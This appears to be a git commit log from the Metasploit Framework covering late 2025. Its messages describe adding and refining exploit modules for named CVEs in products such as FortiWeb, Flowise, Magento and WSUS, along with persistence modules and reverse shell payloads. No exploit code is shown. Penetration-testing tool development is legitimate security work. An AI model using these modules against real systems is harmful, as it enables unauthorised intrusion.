Valentin Lobstein 296e931b7d Fix WordPress lab permissions in documentation 2025-12-04 01:39:25 +01:00
Valentin Lobstein b3fc1b05e5 Add WordPress King Addons privilege escalation exploit (CVE-2025-8489) 2025-12-04 01:37:40 +01:00
jenkins-metasploit 81a1808b5d automatic module_metadata_base.json update 2025-12-03 21:21:03 +00:00
Spencer McIntyre 0f795d715e Merge pull request #20741 from SaiSakthidar/remove-cain
Remove CAIN
2025-12-03 16:12:17 -05:00
Kyle Bouchard 78710633e2 Remove current date constraint from uploaded path 2025-12-03 15:46:07 -05:00
SaiSakthidar 98dd33a3cd Remove CAIN 2025-12-03 15:42:57 -05:00
Spencer McIntyre 334c599cb3 Remove this guard, it's no longer required 2025-12-03 14:00:17 -05:00
Dean Welch 2de3623274 Combine ssh_login and ssh_login_pubkey modules 2025-12-03 14:48:12 +00:00
FutileSkills 2927050056 Revise escpos_tcp_command_injector documentation
Updated the documentation for the escpos_tcp_command_injector module to reflect changes in option names and usage instructions.
2025-12-03 04:35:38 -06:00
FutileSkills 8a2df64987 Update default action in escpos_tcp_command_injector 2025-12-03 04:22:00 -06:00
FutileSkills 49d68e0991 Fix formatting of drawer count option in escpos_tcp_command_injector 2025-12-03 04:09:53 -06:00
FutileSkills 8589d7cc40 Update modules/auxiliary/admin/printer/escpos_tcp_command_injector.rb
Co-authored-by: Brendan <bwatters@rapid7.com>
2025-12-03 03:58:28 -06:00
FutileSkills f4a3e67b0c Update modules/auxiliary/admin/printer/escpos_tcp_command_injector.rb
Co-authored-by: Brendan <bwatters@rapid7.com>
2025-12-03 03:58:08 -06:00
FutileSkills 6e89c9bced Update modules/auxiliary/admin/printer/escpos_tcp_command_injector.rb
Co-authored-by: Brendan <bwatters@rapid7.com>
2025-12-03 03:57:33 -06:00
jheysel-r7 81e23bdbdd Merge pull request #20677 from zeroSteiner/fix/issue/18745
Support Encrypted MSSQL Sessions
2025-12-02 16:03:31 -08:00
Valentin Lobstein 0ccffdd5ff Fix wp_ai_engine_mcp_rce: handle existing users by updating password via MCP fields API 2025-12-03 00:41:16 +01:00
Spencer McIntyre c425f1519c Support relaying to MSSQL server that require TLS 2025-12-02 16:10:07 -05:00
Spencer McIntyre db1e0187c3 Fix the PostreSQL SSL tests for #starttls method 2025-12-02 16:10:07 -05:00
Spencer McIntyre 66a4aba1ad Remove the old MS-TDS SSL Proxy code 2025-12-02 16:10:07 -05:00
Spencer McIntyre 9c1f545562 Initialize the info for web sockets 2025-12-02 16:10:07 -05:00
Spencer McIntyre d4ba707fa5 Add the new encrypted MsTds channel 2025-12-02 16:10:06 -05:00
Spencer McIntyre dcd3a62e88 Switch to the new fiber relay manager 2025-12-02 16:09:58 -05:00
Spencer McIntyre 3908fd4829 Use the new #starttls method 2025-12-02 16:09:31 -05:00
Spencer McIntyre 8e3a97b3e0 Don't open pass_file if it's blank 2025-12-02 16:09:31 -05:00
jenkins-metasploit ce2dc0bb03 automatic module_metadata_base.json update 2025-12-01 11:53:49 +00:00
Diego Ledda d20345263b Merge pull request #20712 from bcoles/linux-riscv-tcp-reverse-shell
Add Linux RISC-V 32-bit/64-bit TCP reverse shell payloads
2025-12-01 12:43:42 +01:00
h00die d3ae3e5556 wmi persistence docs 2025-11-30 10:51:45 -05:00
whotwagner 4decd07c29 Merged changes 2025-11-28 20:54:40 +00:00
Valentin Lobstein 3cc10301fd Simplify SSL configuration by passing ssl option directly to start_service instead of modifying datastore 2025-11-28 21:54:07 +01:00
whotwagner 2018f9f1c3 Refactoring taiga-exploit 2025-11-28 20:53:26 +00:00
Christophe De La Fuente a392283b1e Add techniques related to unconstrained delegation modules 2025-11-28 19:17:03 +01:00
Christophe De La Fuente 8e51f598f3 Add MITRE ATT&CK technique for Kerberos related modules 2025-11-28 17:29:57 +01:00
Martin Sutovsky 20fcecc963 Adds exception raising 2025-11-28 12:40:23 +01:00
sfewer-r7 795c38c524 Combine the 7.x and 6.x targets together, as Linux payloads work on 7.x also, so this target is Unix and Linux. This leaves the 8.x target Unix only due to IMA appraisal. 2025-11-28 10:12:02 +00:00
jenkins-metasploit 3547984092 automatic module_metadata_base.json update 2025-11-28 06:51:42 +00:00
msutovsky-r7 d7c307bb69 Land #20709, adds module for Twonky Server Authentication Bypass (CVE-2025-13315,CVE-2025-13316)
Auxiliary module for CVE-2025-13315/CVE-2025-13316 - Twonky Server Log Leak Authentication Bypass
2025-11-28 07:35:30 +01:00
Valentin Lobstein b1b41017c1 Use CheckCode constants instead of string comparison in check method 2025-11-27 22:53:32 +01:00
Valentin Lobstein 4d24789d04 Make USERNAME, PASSWORD, and EMAIL datastore options required 2025-11-27 22:52:19 +01:00
Valentin Lobstein 1b7acbf684 Add Advanced Options section to documentation (XXETriggerTimeout and DTD_PROTO) 2025-11-27 22:22:01 +01:00
Valentin Lobstein 1e4527d833 Synchronize local server SSL with DTD_PROTO option instead of forcing HTTP 2025-11-27 22:11:50 +01:00
Valentin Lobstein dd06d4c120 Replace sleep(2) with retry_until_truthy for XXE trigger and add configurable timeout option 2025-11-27 21:37:39 +01:00
Valentin Lobstein 9647236b42 Make SSL configurable via datastore and improve comment accuracy 2025-11-27 21:35:05 +01:00
Valentin Lobstein f4ec54f25e Fix: Make FILE and LOG_PATH required options and improve formatting 2025-11-27 21:33:09 +01:00
sfewer-r7 014312873c get both unix and linux payloads working on 6.x. Add a note to the docs about setting a gateway. 2025-11-27 20:28:44 +00:00
Shubham0699 d3f617bf08 Fix Bailiwicked module exceptions and SRCPORT default
Fixes #20172

Both bailiwicked modules were throwing 'undefined method each for IPAddr'
exceptions due to DNS library changes. Fixed by:

1. Wrapping IPAddr object in array when passing to nameservers parameter
   - Changed nameservers: rr1.address to nameservers: [rr1.address.to_s]
   - Applies to both bailiwicked_domain.rb and bailiwicked_host.rb

2. Changed SRCPORT default from nil to 0 for automatic port selection
   - Prevents validation errors when running modules
   - 0 is the documented value for automatic port selection
2025-11-27 21:19:02 +05:30
jenkins-metasploit f9b61890b5 automatic module_metadata_base.json update 2025-11-27 14:26:36 +00:00
msutovsky-r7 b6330acb12 Land #20718, adds module for Monsta FTP RCE (CVE-2025-34299)
Add Monsta FTP downloadFile RCE (CVE-2025-34299)
2025-11-27 15:16:58 +01:00
jenkins-metasploit 99533752f3 Bump version of framework to 6.4.101 2025-11-27 13:52:30 +00:00
Martin Sutovsky 1153f3cf6a Fixing regex 2025-11-27 14:33:57 +01:00
sfewer-r7 f5e8aa83be add in exploit support for FortiWeb versions 6.x which are vulnerable, but no longer under support from the vendor. 2025-11-27 12:43:19 +00:00
bcoles 2d414d39fa Add Linux RISC-V command payload adapters 2025-11-27 20:46:30 +11:00
jenkins-metasploit 205221fba9 automatic module_metadata_base.json update 2025-11-27 00:33:37 +00:00
adfoster-r7 4c5d086aeb Merge pull request #20731 from adfoster-r7/fix-broken-module-metadata
Fix broken module metadata
2025-11-27 00:07:11 +00:00
adfoster-r7 db3ac6acc6 Fix broken module metadata 2025-11-26 22:51:40 +00:00
Valentin Lobstein c8ec6e2e0d Fix magento_sessionreaper: use server-returned upload path when available, fallback to default path 2025-11-26 19:11:21 +01:00
Valentin Lobstein 819b259b4c Apply reviewer suggestions 2025-11-26 18:27:52 +01:00
Valentin Lobstein 9661bfe252 Update modules/exploits/multi/http/monsta_ftp_downloadfile_rce.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-11-26 17:54:12 +01:00
Valentin Lobstein e3a2148660 Update modules/exploits/multi/http/monsta_ftp_downloadfile_rce.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-11-26 17:53:40 +01:00
Valentin Lobstein 278f3c99d2 Add error handling for upload failures in magento_sessionreaper module 2025-11-26 00:56:05 +01:00
Valentin Lobstein 4ff9fd4542 Apply reviewer suggestions and remove unnecessary Options section from documentation 2025-11-25 23:48:39 +01:00
bcoles c467330892 Merge remote-tracking branch 'upstream/master' into linux-riscv-tcp-reverse-shell 2025-11-26 09:22:55 +11:00
jenkins-metasploit 7325d2a265 automatic module_metadata_base.json update 2025-11-25 20:23:49 +00:00
Brendan e998b91aee Merge pull request #20717 from sfewer-r7/fortiweb-exploit-rce
Add exploit module for Fortinet FortiWeb (CVE-2025-64446 + CVE-2025-58034)
2025-11-25 14:14:31 -06:00
jenkins-metasploit 766150ae27 automatic module_metadata_base.json update 2025-11-25 20:09:05 +00:00
Brendan 1912fe2a95 Merge pull request #20702 from Zedeldi/igel-os-modules
IGEL OS modules
2025-11-25 13:59:44 -06:00
jenkins-metasploit 3dfa649591 automatic module_metadata_base.json update 2025-11-25 17:20:50 +00:00
Diego Ledda 3b799a50e8 Merge pull request #20703 from bcoles/linux-riscv-chmod-payloads
Add Linux RISC-V chmod payloads
2025-11-25 18:10:57 +01:00
jenkins-metasploit 2eb71ad31c automatic module_metadata_base.json update 2025-11-25 15:33:53 +00:00
msutovsky-r7 47b742ba0c Land #20482, fixes bug in HTTP-based login scanners
Fix HTTP-based login scanners when using SSL with custom port
2025-11-25 16:23:39 +01:00
adfoster-r7 7e454475e4 Merge pull request #20721 from cpomfret-r7/fix-nexpose-api-error-when-site-has-credential
Fix issue when scanning via Nexpose plugin when Site has Credential
2025-11-25 13:03:10 +00:00
sfewer-r7 fa03ac8b66 on 7.4.8 the command nohup is not available. we must execute our payload in a new session, so we use a python stub to essentially call setsid. This has been tested to work on both 8.0.1 and 7.4.8. Teh payload cmd/unix/reverse_python isnot working as it previously was, so I am removing from the list of confirmed paylaods. The other two, cmd/unix/reverse_bash and cmd/unix/reverse_openssl work fine on both versions 2025-11-25 11:25:41 +00:00
sfewer-r7 8a054b74db improve check logic to actualy parse JSON result for expected reply, tested against 8.0.1 and 7.4.8 2025-11-25 11:22:43 +00:00
Valentin Lobstein be7ad39127 Fix reference URL in documentation to correct Searchlight Cyber research article 2025-11-24 23:26:29 +01:00
Valentin Lobstein 0cc0ea2250 Fix reference URL to correct Searchlight Cyber research article 2025-11-24 23:25:46 +01:00
Valentin Lobstein c89d53ed98 Add FileDropper mixin and register files for automatic cleanup 2025-11-24 22:06:46 +01:00
Valentin Lobstein 39c20a97d0 Fix PHP syntax error in payload stub - add quotes around POST parameter 2025-11-24 21:18:50 +01:00
Valentin Lobstein 9ef10eeea8 Update documentation with complete Docker lab setup files 2025-11-24 21:12:14 +01:00
Valentin Lobstein 1623660bec Add Magento SessionReaper (CVE-2025-54236) exploit module 2025-11-24 21:04:20 +01:00
jenkins-metasploit ebd5b129bc automatic module_metadata_base.json update 2025-11-24 17:28:24 +00:00
jheysel-r7 4a012dd06a Merge pull request #20637 from zeroSteiner/feat/mod/smb-to-mssql
Add an SMB to MSSQL NTLM Relay module
2025-11-24 09:17:45 -08:00
Zedeldi d1fe17747c Add check methods and update DisclosureDate 2025-11-24 17:12:56 +00:00
Zedeldi 4b2798f357 Correct vulnerable version information 2025-11-24 17:10:51 +00:00
Chris Pomfret f842bb7169 Nexpose plugin - Query nexpose via v3 api when doing scan 2025-11-24 12:15:55 +00:00
Zedeldi ce926fd3d1 Update vulnerable IGEL OS version to < 11.09.310 2025-11-24 11:57:18 +00:00
Zedeldi ffaf43af2f Add writable? and file? checks to write_payload 2025-11-24 11:45:34 +00:00
Zedeldi 933fb7bdf1 Add clean-up information 2025-11-24 11:43:46 +00:00
Zedeldi 002795c5be Update module information in documentation 2025-11-24 11:24:23 +00:00
Zedeldi 0c4d1e70d1 Add support for ARCH_CMD payload 2025-11-24 11:16:22 +00:00
msutovsky-r7 d05f50c802 Land #20693, fixes race condition in reloading extension klasses
fix: preload extension klasses during bootstrap
2025-11-24 09:28:38 +01:00
bcoles 2e000c2b1c Add support for LoongArch64 payloads 2025-11-23 17:22:32 +11:00
bcoles bb5ea49684 Add Linux RISC-V 32-bit/64-bit TCP reverse shell payloads 2025-11-23 16:09:09 +11:00
Valentin Lobstein 2b71c84d80 Improve code quality: simplify methods, use dig, compile regex, remove unnecessary variables 2025-11-23 05:40:49 +01:00
Valentin Lobstein 1a93bf7634 Update disclosure date to 2025-11-04 2025-11-23 05:27:19 +01:00
Valentin Lobstein 080230edd0 Add WordPress AI Engine MCP RCE exploit (CVE-2025-11749) 2025-11-23 03:56:11 +01:00
h00die c997549060 wmi persistence docs 2025-11-22 16:38:57 -05:00
h00die b996c0ee4c wmi persistence 2025-11-22 16:37:57 -05:00
h00die 45250497d5 wmi uptime persistence 2025-11-22 09:13:01 -05:00
Valentin Lobstein ad2bf62939 Randomize XXE entity name in N-able N-Central module 2025-11-22 04:39:29 +01:00
Valentin Lobstein 4e02af64cc Fix N-able N-Central XXE module: improve file extraction, combine report methods, fix SSL handling 2025-11-22 04:37:38 +01:00
Valentin Lobstein 8c432302b0 Fix code quality improvements and optimizations 2025-11-22 04:15:57 +01:00
jenkins-metasploit e670167fe1 automatic module_metadata_base.json update 2025-11-21 20:39:02 +00:00
Brendan 21777b8969 Merge pull request #20685 from msutovsky-r7/persistence/windows/notepad++_persistence
Adds notepad++ persistence module for Windows
2025-11-21 14:28:28 -06:00
msutovsky-r7 8f2525aba7 Land #20705, adds modules for Flowise RCEs (CVE-2025-59528, CVE-2025-8943)
Add Flowise RCE exploits (CVE-2025-59528, CVE-2025-8943)
2025-11-21 21:20:22 +01:00
Valentin Lobstein e91086a1d0 Fix disclosure date for CVE-2025-34299 2025-11-21 20:49:34 +01:00
Valentin Lobstein 8cffe50470 Add Monsta FTP downloadFile RCE (CVE-2025-34299) 2025-11-21 20:43:37 +01:00
Valentin Lobstein 8702256ec2 Remove manual substitution and add BadChars for backslash and quote in flowise_js_rce 2025-11-21 19:34:33 +01:00
jenkins-metasploit cb68802c7b Bump version of framework to 6.4.100 2025-11-21 16:45:50 +00:00
sfewer-r7 b8cefb1af9 add nohup when bootstraping the payload to avoid the scenario when the parent dies it tears down our payload child process 2025-11-21 15:54:41 +00:00
Zedeldi da33eed842 Use fail_with instead of a check method 2025-11-21 14:02:05 +00:00
Zedeldi c0a756a751 Verify registry has been written successfully 2025-11-21 13:52:41 +00:00
Zedeldi 425adfa9bf Prefer create_process over cmd_exec for commands with arguments 2025-11-21 13:40:25 +00:00
Zedeldi dc9eddc7a2 Use store_loot for igel_dump_file 2025-11-21 13:22:22 +00:00
Zedeldi b13137886a Add IGEL OS and vulnerability summary to documentation 2025-11-21 13:09:28 +00:00
bcoles a5e3a5ea85 Add Linux RISC-V 32-bit/64-bit prepends 2025-11-21 23:55:05 +11:00
sfewer-r7 aff76622fa add in the unauth RCE exploit module for CVE-2025-64446 + CVE-2025-58034 2025-11-21 12:22:25 +00:00
Martin Sutovsky 72d7e1a6f1 Rubocopes 2025-11-21 13:18:11 +01:00
Martin Sutovsky 098af341f9 Fix payload name escaping 2025-11-21 13:04:52 +01:00
Zedeldi ba702d40ea Remove x86 target and redundant DefaultOptions 2025-11-21 12:04:49 +00:00
h00die 3251560ebc wmi interval 2025-11-20 18:52:22 -05:00
Valentin Lobstein 9734a69ae8 Add N-able N-Central authentication bypass and XXE scanner module (CVE-2025-9316, CVE-2025-11700) 2025-11-21 00:18:12 +01:00
Valentin Lobstein 6215da4754 Apply review suggestions: use case/when, improve error handling, simplify code 2025-11-20 22:41:08 +01:00
Valentin Lobstein 8cd32c04ea Update modules/exploits/multi/http/flowise_js_rce.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-11-20 21:55:43 +01:00
Valentin Lobstein db082959f4 Update modules/exploits/multi/http/flowise_custommcp_rce.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-11-20 21:55:20 +01:00
Valentin Lobstein 11c64b8f10 Update lib/msf/core/exploit/remote/http/flowise.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-11-20 21:55:10 +01:00
Spencer McIntyre 000d310914 MSSQL auto auth should look at the domain
If the domain is set, using NTLM where the domain is used, otherwise use
plaintext / sql authentiction.
2025-11-20 13:32:33 -05:00
jenkins-metasploit 93f4775e3a automatic module_metadata_base.json update 2025-11-20 17:42:56 +00:00
Brendan bb728c44d7 Merge pull request #20560 from cdelafuente-r7/feat/mitre/T1021
Add T1021 "Remote Services" MITRE technique and sub-technique references
2025-11-20 11:19:31 -06:00
Martin Sutovsky d904a526ee Shamefully removes pry and pry-byebug 2025-11-20 17:08:28 +01:00
whotwagner 55f660ccfb Update modules/exploits/multi/http/taiga_tribe_gig_unserial.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-11-20 16:56:58 +01:00
whotwagner 932eae7034 Update modules/exploits/multi/http/taiga_tribe_gig_unserial.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-11-20 16:55:32 +01:00
bcoles d510adb13c Add Linux RISC-V chmod payloads 2025-11-21 01:37:12 +11:00
jenkins-metasploit 374074cad5 automatic module_metadata_base.json update 2025-11-20 14:25:18 +00:00
msutovsky-r7 e2097ee1bc Land #20701, adds windows WSL registry persistence module
Windows WSL registry persistence
2025-11-20 15:15:22 +01:00
msutovsky-r7 d79e8a3402 Land #20708, fixes msfdb startup
Fix msfdb startup
2025-11-20 14:36:20 +01:00
msutovsky-r7 19ffa739b7 Land #20711, fixes description in AppendExit datastore option
Msf::Payload::Linux::Prepends: Fix AppendExit description
2025-11-20 11:54:37 +01:00
Martin Sutovsky abaa4e6c7a Fixes cmd_exec call 2025-11-20 11:27:34 +01:00
bcoles eff40ba207 Msf::Payload::Linux::Prepends: Fix AppendExit description 2025-11-20 18:30:44 +11:00
jenkins-metasploit 8f19fe532b automatic module_metadata_base.json update 2025-11-19 23:23:59 +00:00
adfoster-r7 dff3e3f4a7 Merge pull request #20694 from cgranleese-r7/add-rubocop-detect-cmd-exec
Adds Rubocop rule to detect calls to old cmd_exec API
2025-11-19 23:14:21 +00:00
h00die 9ff3f94bc9 review comments for wsl persistence 2025-11-19 17:37:55 -05:00
adfoster-r7 b0ce58d631 Update URL in specs 2025-11-19 22:24:15 +00:00
Spencer McIntyre ebc70000ce Support auto authentication for MSSQL 2025-11-19 17:11:34 -05:00
Valentin Lobstein 9624f75617 Simplify code formatting: shorten lines and improve readability 2025-11-19 23:05:01 +01:00
Valentin Lobstein 3102b31767 Move FETCH_COMMAND WGET to Unix/Linux target DefaultOptions only 2025-11-19 22:59:22 +01:00
Valentin Lobstein 6ab2452153 Fix documentation inconsistency: update ports for Flowise 3.0.1 (3005) and add Basic Auth service example 2025-11-19 22:58:27 +01:00
whotwagner 04e64697c0 Refactoring taiga-exploit 2025-11-19 21:29:10 +00:00
Valentin Lobstein 8fbbc3e043 Update flowise_custommcp_rce documentation: add Basic Auth testing scenario 2025-11-19 22:24:28 +01:00
Valentin Lobstein 44cf2e309f Add Flowise RCE exploits (CVE-2025-59528, CVE-2025-8943) with shared mixin, documentation, and Docker Compose setup 2025-11-19 22:12:49 +01:00
Zedeldi 8d28ce611a Revert to cmd_exec for modify_service and improve code style 2025-11-19 20:33:46 +00:00
whotwagner 1e5bd6def5 Refactoring taiga-exploit 2025-11-19 20:31:33 +00:00
whotwagner d8bb16d579 Refactoring taiga-exploit 2025-11-19 20:12:18 +00:00
whotwagner 467b5c25b3 Refactoring taiga-exploit 2025-11-19 20:09:30 +00:00
Zedeldi bc2c397b8c Add check for root access to igel_persistence 2025-11-19 20:01:57 +00:00
whotwagner 0781d618fd Refactoring taiga-exploit 2025-11-19 19:43:27 +00:00
remmons-r7 25d87fc2c5 Delete accidental extra Ruby file commit 2025-11-19 14:19:05 -05:00
remmons-r7 7aff5f333b Delete an accidental documentation commit 2025-11-19 14:18:25 -05:00
Valentin Lobstein df1c157471 Improve Flowise CustomMCP RCE exploit stability with Basic Auth support and HTTP response validation 2025-11-19 20:12:31 +01:00
whotwagner 4c3ee4f499 Refactoring taiga-exploit and docs 2025-11-19 19:09:46 +00:00
remmons-r7 9e057ae1b7 Create twonky_authbypass_logleak.rb 2025-11-19 14:09:38 -05:00
remmons-r7 252023222b Create twonky_authbypass_logleak.md 2025-11-19 14:06:52 -05:00
Valentin Lobstein f991bd58a4 Update modules/exploits/multi/http/flowise_custommcp_rce.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-11-19 19:57:48 +01:00
Valentin Lobstein 7ba143452c Change checkcode
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-11-19 19:57:03 +01:00
Valentin Lobstein 8178313a46 Delete SSL param
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-11-19 19:56:43 +01:00
Valentin Lobstein a187b9824e Remove CVE ID from title
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2025-11-19 19:56:23 +01:00
remmons-r7 5b55bdaaaf Merge branch 'rapid7:master' into master 2025-11-19 13:56:13 -05:00
Zack Didcott beed317573 Use create_process instead of cmd_exec
Co-authored-by: Brendan <bwatters@rapid7.com>
2025-11-19 18:02:08 +00:00
Zack Didcott 22aead0db1 Use vprint_status for modify_service and restart_service
Co-authored-by: Brendan <bwatters@rapid7.com>
2025-11-19 18:01:05 +00:00
Christophe De La Fuente bdef9a6b46 Fix msfdb startup 2025-11-19 18:50:26 +01:00
Christophe De La Fuente 179a545312 Remove false positive references 2025-11-19 17:34:15 +01:00
cgranleese-r7 d64625d95f Adds post mixin docs and update cop message 2025-11-19 16:28:07 +00:00
Martin Sutovsky 554c952d06 Adds payload name escaping 2025-11-19 15:58:30 +01:00
msutovsky-r7 d8b544b1ab Land #20707, adds note "CAP_SYS_BOOT privileges are required" to Linux Reboot payloads
Add note "CAP_SYS_BOOT privileges are required" to Linux Reboot payloads
2025-11-19 12:10:03 +01:00
bcoles c77c138117 Add note "CAP_SYS_BOOT privileges are required" to Linux Reboot payloads 2025-11-19 21:39:44 +11:00
Martin Sutovsky 6957f73bf5 Adds architecture match check 2025-11-19 08:12:30 +01:00
Martin Sutovsky 197dbf921d Fixes Windows persistence 2025-11-19 07:52:54 +01:00
Martin Sutovsky ec8906bbd4 Adds docs 2025-11-19 07:17:07 +01:00
Martin Sutovsky 1241cb724e Adds MITRE reference, adds additional datastore options, code cleanup 2025-11-19 06:58:56 +01:00
h00die 2d41323e78 event_log working 2025-11-18 19:40:03 -05:00
h00die 58f29548b3 review for windows/persistence/wsl/registry 2025-11-18 18:50:07 -05:00
Valentin Lobstein b26c4f5c7b Add Flowise Custom MCP RCE exploit (CVE-2025-8943) 2025-11-18 22:25:39 +01:00
Valentin Lobstein 88aadcc856 Add Flowise Custom MCP RCE exploit (CVE-2025-8943) 2025-11-18 22:03:59 +01:00
jenkins-metasploit 3576e2bcef automatic module_metadata_base.json update 2025-11-18 15:59:02 +00:00
Brendan 069de9fbf8 Merge pull request #20638 from h00die/windows_service_persistence
update windows service to persistence mixin
2025-11-18 09:49:06 -06:00
Martin Sutovsky e99c1f648d Expands fix for all HTTP-based login scanners 2025-11-18 16:42:59 +01:00
whotwagner 5c6b0543a4 Fixed a typo in taiga-module-docs 2025-11-18 09:59:26 +00:00
whotwagner f80f10ce3d Refactoring taiga-exploit 2025-11-18 09:58:47 +00:00
whotwagner 351bba0c45 Renamed extension for taiga-exploit-docs to .md 2025-11-18 09:52:06 +00:00
h00die 3209fdc937 remove old file 2025-11-17 19:03:55 -05:00
h00die 7c8fbd1672 rework windows service persistence 2025-11-17 19:02:54 -05:00
h00die a0222d0783 rework windows service persistence 2025-11-17 19:02:53 -05:00
h00die 1ad89ef1ef rewriting service 2025-11-17 19:02:53 -05:00
h00die 06f5c89bf4 throw this away 2025-11-17 19:02:53 -05:00
h00die 92e1720ad5 fix docs 2025-11-17 19:02:53 -05:00
h00die 8c211b4d4a fix sc commands in windows service persistence 2025-11-17 19:02:53 -05:00
h00die 450e1df340 windows service now with persistence mixin 2025-11-17 19:02:50 -05:00
h00die 19661e5694 temp for windows wmi persistence 2025-11-17 16:53:58 -05:00
Zedeldi c6db0d4285 Move IGEL OS persistence module to linux/persistence 2025-11-17 18:42:28 +00:00
Zedeldi 796d941354 Code formatting changes 2025-11-17 16:38:13 +00:00
Zedeldi c37f7872a3 Add documentation for IGEL OS modules 2025-11-17 16:33:15 +00:00
Zedeldi 1436803783 Strip first line and quotes 2025-11-17 16:33:00 +00:00
jheysel-r7 8e642d4376 Merge pull request #20689 from zeroSteiner/feat/mod/socket-channel-tests
Add socket channel tests
2025-11-17 08:32:14 -08:00
jenkins-metasploit 8062673bfc automatic module_metadata_base.json update 2025-11-17 15:19:06 +00:00
Zedeldi f29505d0d0 Add IGEL OS modules 2025-11-17 15:18:09 +00:00
Brendan c3f221e2f2 Merge pull request #20699 from sfewer-r7/fortiweb-exploit-cve
Update auxiliary/admin/http/fortinet_fortiweb_create_admin with CVE ID and advisory URL
2025-11-17 09:08:47 -06:00
Martin Sutovsky 92c2f2516d Adds option for user-specified path 2025-11-17 11:42:42 +01:00
Martin Sutovsky 8285b433cb Addresses comments 2025-11-17 11:04:28 +01:00
Martin Sutovsky 0e26719cf2 Adds dll_exitprocess 2025-11-17 09:24:09 +01:00
h00die e3560e43cf windows wsl registry persistence 2025-11-16 08:35:44 -05:00
whotwagner ffe3d0acf8 Merge branch 'exploit_taiga_tribe_gig' of github.com:whotwagner/metasploit-framework into exploit_taiga_tribe_gig 2025-11-15 22:41:17 +00:00
whotwagner ba24ea0362 Added exploit module for unserialization vulnerability in taiga.io(CVE-2025-62368) 2025-11-15 22:41:01 +00:00
whotwagner 466805a631 Fixed style-issues 2025-11-15 22:36:48 +00:00
Spencer McIntyre f2a05ad295 Run them tests 2025-11-14 16:18:47 -05:00
Spencer McIntyre 3497f70692 Fix a UDP binding error and support LHOST/RHOST 2025-11-14 15:54:30 -05:00
sfewer-r7 c1ff36668c disclosure date 2025-11-14 17:06:30 +00:00
sfewer-r7 b1327361e9 add in new CVE ID and vendor advisory 2025-11-14 17:04:33 +00:00
jenkins-metasploit 3aba23186c automatic module_metadata_base.json update 2025-11-14 15:42:34 +00:00
Brendan 9dcea0c20d Merge pull request #20698 from sfewer-r7/fortiweb-exploit
Add an aux module for the recent FortiWeb exploit (No CVE assigned yet)
2025-11-14 09:32:03 -06:00
jenkins-metasploit 4cd70a4d15 automatic module_metadata_base.json update 2025-11-14 13:49:09 +00:00
Spencer McIntyre 79145b5c50 Add a test module for UDP and TCP channels 2025-11-14 08:45:22 -05:00
Spencer McIntyre c000e9cfa5 Merge pull request #20687 from dwelch-r7/winrm-error-handling-improvements
Add error handling for winrm login issues
2025-11-14 08:39:26 -05:00
Dean Welch 771856ac6b Use print_brute over print_warning 2025-11-14 13:22:54 +00:00
sfewer-r7 06fbe46172 add in aux moduel for recent FortiWeb exploit 2025-11-14 12:02:10 +00:00
jheysel-r7 9cdf7bd9b2 Merge pull request #20695 from zeroSteiner/fix/bump-payloads/2.0.237
Update metasploit-payloads gem to 2.0.237
2025-11-13 09:29:56 -08:00
Spencer McIntyre b1f57b303f Update metasploit-payloads gem to 2.0.237
Includes changes from:
* rapid7/metasploit-payloads#782
* rapid7/metasploit-payloads#781
2025-11-13 12:11:10 -05:00
cgranleese-r7 7722d19ca3 Adds Rubocop rule to detect calls to old cmd_exec API 2025-11-13 16:33:36 +00:00
dledda-r7 362ed421cf fix: commenting klasses pre-loader 2025-11-13 10:53:33 -05:00
dledda-r7 147cf9bc82 fix: include stdapi/stdapi in namespaced extensions 2025-11-13 10:51:04 -05:00
jenkins-metasploit 871ac7db61 Bump version of framework to 6.4.99 2025-11-13 11:14:45 +00:00
jenkins-metasploit 7f95c562ae automatic module_metadata_base.json update 2025-11-12 18:54:53 +00:00
jheysel-r7 90ff800e41 Merge pull request #20669 from stfnw/azure-ad-login-default-message
azure_ad_login: add context to error message
2025-11-12 10:45:32 -08:00
Martin Sutovsky 58eec7d319 Adds docs 2025-11-12 16:28:54 +01:00
dledda-r7 c5fd2650a8 fix: preload extension klasses during bootstrap 2025-11-12 10:07:50 -05:00
jenkins-metasploit 667fd73597 automatic module_metadata_base.json update 2025-11-12 11:50:09 +00:00
Diego Ledda c007d3a89f Merge pull request #20674 from msutovsky-r7/exploit/win/cve-2025-59287
Adds module for unauthenticated deserialization in WSUS (CVE-2025-59287)
2025-11-12 12:40:32 +01:00
Martin Sutovsky e35bd89033 Expands check method 2025-11-12 10:35:23 +01:00
jenkins-metasploit 8648398b11 automatic module_metadata_base.json update 2025-11-11 15:50:51 +00:00
Diego Ledda 29088b4712 Merge pull request #20576 from msutovsky-r7/modules/persistence/linqpad_deserialization
Moves LINQPad module into persistence category
2025-11-11 16:41:12 +01:00
Martin Sutovsky 81abe9d964 Cleans up code 2025-11-11 16:30:30 +01:00
Martin Sutovsky d238b4626d Adds Python version extraction for Windows 2025-11-11 15:57:30 +01:00
Martin Sutovsky 9058f6676b Removes if condition 2025-11-11 11:22:31 +01:00
Martin Sutovsky 7ac1fd9de0 Adds support for Windows 2025-11-11 10:21:08 +01:00
Martin Sutovsky 546856967a Enhances payload delivery, adds docs base 2025-11-11 08:39:40 +01:00
Spencer McIntyre b545defca5 Merge pull request #20690 from dbono-r7/patch-1
Update named_pipes.txt
2025-11-10 17:27:58 -05:00
dbono-r7 7aebd592ef Update named_pipes.txt
Added the cert pipe for quick unauthenticated for likely Certificate Authority servers.
2025-11-10 16:00:39 -06:00
Jack Heysel 5fc6af500f Use one regex to match both failures 2025-11-10 12:46:55 -05:00
Martin Sutovsky 6aeb81a499 Adds MITRE reference, updates docs 2025-11-10 18:32:13 +01:00
jheysel-r7 0c6a8c10c5 Merge pull request #20625 from h00die/fix_exploit_docs_options
Update exploit docs to use modern h3 for options instead of original spec (bold)
2025-11-10 08:26:03 -08:00
Jack Heysel 99e35cb591 Keep test, add failure to known failures 2025-11-10 11:12:23 -05:00
